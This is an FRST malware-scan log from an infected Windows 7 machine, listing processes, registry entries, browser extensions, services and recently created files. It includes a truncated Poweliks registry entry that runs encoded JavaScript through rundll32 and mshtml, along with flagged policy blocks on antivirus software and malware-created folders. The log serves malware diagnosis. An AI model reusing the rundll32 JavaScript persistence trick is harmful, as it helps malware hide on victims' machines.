Description: msiexec.exe1.0.0.1002545d1e98unknown0.0.0.000000000c000000500020919189401cffaf82a9560b7C:\Windows\Installer\{3C781D98-1D70-4980-9877-1CD49325396C}\msiexec.exeunknown69e3072b-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: msiexec.exe3.8.0.2545c8b63msiexec.exe3.8.0.2545c8b63c0000005000012df261401cffaf829a42077C:\Windows\Installer\{2E04477B-8D51-4737-AAC9-03CBDE666401}\msiexec.exeC:\Windows\Installer\{2E04477B-8D51-4737-AAC9-03CBDE666401}\msiexec.exe69e55124-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 04:45:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/07/2014 01:21:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63igdumd32.dll8.14.10.19304aba746bc000000500004ff81c8801cffa1fd8f641beC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\igdumd32.dll5dd4497c-6646-11e4-945c-001e4f99a790

Error: (11/06/2014 07:09:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™2 CPU 6300 @ 1.86GHz
Percentage of memory in use: 39%
Total physical RAM: 3061.61 MB
Available physical RAM: 1840.61 MB
Total Pagefile: 6121.52 MB
Available Pagefile: 4462.23 MB
Total Virtual: 2047.88 MB
Available Virtual: 1895.42 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:698.44 GB) (Free:656.83 GB) NTFS
Drive d: (HP DJ1510) (CDROM) (Total:0.37 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 03A5ED43)
Partition 1: (Active) - (Size=200 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=698.4 GB) - (Type=07 NTFS)

==================== End Of Log ============================

***********

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 08-11-2014 01
Ran by Jack (administrator) on JACK-PC on 08-11-2014 12:43:03
Running from C:\Users\Jack\Downloads
Loaded Profile: Jack (Available profiles: Jack)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Hewlett-Packard Company) C:\Program Files\HP\Common\HPSupportSolutionsFrameworkService.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Windows\Installer\{F9005E4A-3F66-4B93-9604-53209B03D6F7}\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
Winlogon\Notify\acikmao: C:\Users\Jack\AppData\Local\acikmao.dll ()
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4825880 2014-10-23] (Piriform Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-10-13] (Glarysoft Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\MountPoints2: {c7920a94-4cb4-11e3-aa4c-806e6f6e6963} - D:\Setup.exe
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BootExecute: autocheck autochk * 
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://xfinity.comcast.net/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xD81BF7C5FEE9CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Old Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKCU - {4AA1010B-C099-473B-B519-B51807026EBF} URL = http://search.yahoo.com/search?p={searchTerms}&b={startPage?}&fr=ie8
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-13]
CHR Extension: (YouTube) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR Extension: (example) - C:\Users\Jack\AppData\LocalLow\{7E81B18D-641B-869C-E732-8442672D77EF}\Jirixam\spufwgyyfmgt [2014-10-30]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [47416 2014-02-05] (Hewlett-Packard Company)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17344 2014-10-25] (Glarysoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R1 MpKsl4d4a1af2; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\MpKsl4d4a1af2.sys [39464 2014-11-08] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-08 12:43 - 2014-11-08 12:44 - 00000000 ____D () C:\Users\Jack\Downloads\CLEANUP
2014-11-08 12:43 - 2014-11-08 12:43 - 00007951 _____ () C:\Users\Jack\Downloads\FRST.txt
2014-11-08 12:42 - 2014-11-08 12:43 - 00000000 ____D () C:\FRST
2014-11-08 12:42 - 2014-11-08 12:42 - 01107968 _____ (Farbar) C:\Users\Jack\Downloads\FRST.exe
2014-11-07 21:02 - 2014-11-07 21:02 - 00023552 _____ () C:\Users\Jack\AppData\Local\acikmao.dll
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\UehaLwahi
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\NeseVdol
2014-11-07 01:50 - 2014-11-07 01:50 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\2E8A529B.sys
2014-11-05 16:37 - 2014-11-05 16:37 - 00000000 ____D () C:\ProgramData\VenqIxjeh
2014-11-05 16:36 - 2014-11-05 16:36 - 00000000 ____D () C:\ProgramData\KupoqIkavk
2014-11-05 02:34 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Ismyihci
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\LukucOkjav
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\CimhAyoj
2014-11-03 23:05 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Waanypi
2014-11-03 23:04 - 2014-11-03 23:04 - 00000000 ____D () C:\ProgramData\FunhEmnol
2014-11-03 23:03 - 2014-11-03 23:03 - 00000144 _____ () C:\Windows\system32\1
2014-11-03 23:03 - 2014-11-03 23:03 - 00000000 ____D () C:\ProgramData\ZixvOfbax
2014-11-01 22:16 - 2014-11-07 04:43 - 00005458 _____ () C:\Windows\PFRO.log
2014-11-01 22:16 - 2014-11-07 04:43 - 00000224 _____ () C:\Windows\setupact.log
2014-11-01 22:16 - 2014-11-01 22:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-11-01 21:08 - 2014-11-08 08:53 - 00031574 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 01:16 - 2014-11-05 16:38 - 00000761 _____ () C:\Windows\system32\Drivers\etc\hosts.txt
2014-11-01 01:16 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\MuztOnba
2014-11-01 01:15 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\UabcIzedk
2014-10-31 22:46 - 2014-11-01 07:06 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-31 22:46 - 2014-11-01 07:06 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-31 22:45 - 2014-11-02 01:10 - 00000000 ___HD () C:\b11f30c
2014-10-31 22:45 - 2014-11-01 01:16 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FrameworkUpdate7
2014-10-31 22:45 - 2014-10-31 22:45 - 00000448 ____H () C:\Users\Jack\AppData\Roaming\麽鎒駓覜
2014-10-30 21:12 - 2014-10-30 21:12 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 20:21 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Desktop\dds.com
2014-10-30 20:18 - 2014-10-30 20:25 - 00000770 _____ () C:\Users\Jack\Desktop\attach.txt
2014-10-30 20:12 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Downloads\dds.com
2014-10-30 19:31 - 2014-10-30 21:16 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 19:23 - 2014-10-30 19:23 - 00001482 _____ () C:\Users\Jack\Desktop\MBAM 10-30.txt
2014-10-30 19:07 - 2014-10-30 20:00 - 00000000 ____D () C:\Users\Jack\Desktop\mbar
2014-10-29 08:01 - 2014-10-29 08:01 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-27 02:04 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-26 18:01 - 2014-10-29 09:02 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 14:47 - 2014-10-26 14:47 - 00000000 _____ () C:\Windows\system32\icsuwxe.dll
2014-10-26 04:12 - 2014-02-03 21:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-10-26 04:10 - 2013-11-23 13:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2014-10-26 04:08 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 04:08 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-26 04:08 - 2013-11-26 03:16 - 03419136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2014-10-25 21:27 - 2014-10-25 21:33 - 00018973 _____ () C:\Users\Jack\Downloads\Result.txt
2014-10-25 21:17 - 2014-10-25 21:18 - 00002880 _____ () C:\Users\Jack\Downloads\FSS.txt
2014-10-25 20:48 - 2014-10-25 20:48 - 00854448 _____ () C:\Users\Jack\Desktop\SecurityCheck.exe
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList
2014-10-25 12:32 - 2014-10-25 12:32 - 00000440 _____ () C:\Users\Jack\Documents\fixlist.txt
2014-10-25 12:17 - 2014-10-25 12:17 - 00000632 _____ () C:\Users\Jack\Desktop\JRT.txt
2014-10-25 11:49 - 2014-10-25 11:49 - 00000000 ____D () C:\Windows\ERUNT
2014-10-25 08:10 - 2014-10-25 08:10 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-25 08:10 - 2014-10-25 08:10 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-25 08:10 - 2014-10-25 08:10 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00645120 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-25 08:10 - 2014-10-25 08:10 - 00610304 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-25 08:10 - 2014-10-25 08:10 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00233472 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00071680 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01247744 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01158144 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01080832 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00906240 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00604160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00364544 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00220160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-10-25 06:54 - 2014-10-25 06:54 - 00017344 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-10-25 06:54 - 2014-10-25 06:54 - 00001057 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00001045 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00000318 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-10-25 06:54 - 2014-10-25 06:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-10-25 06:53 - 2014-11-06 22:25 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\GlarySoft
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\DiskDefrag
2014-10-18 15:16 - 2014-10-18 15:16 - 00000464 __RSH () C:\ProgramData\ntuser.pol
2014-10-15 02:33 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 02:33 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 02:33 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 02:33 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 02:32 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 02:32 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 02:32 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 02:32 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 02:32 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 02:32 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 02:32 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
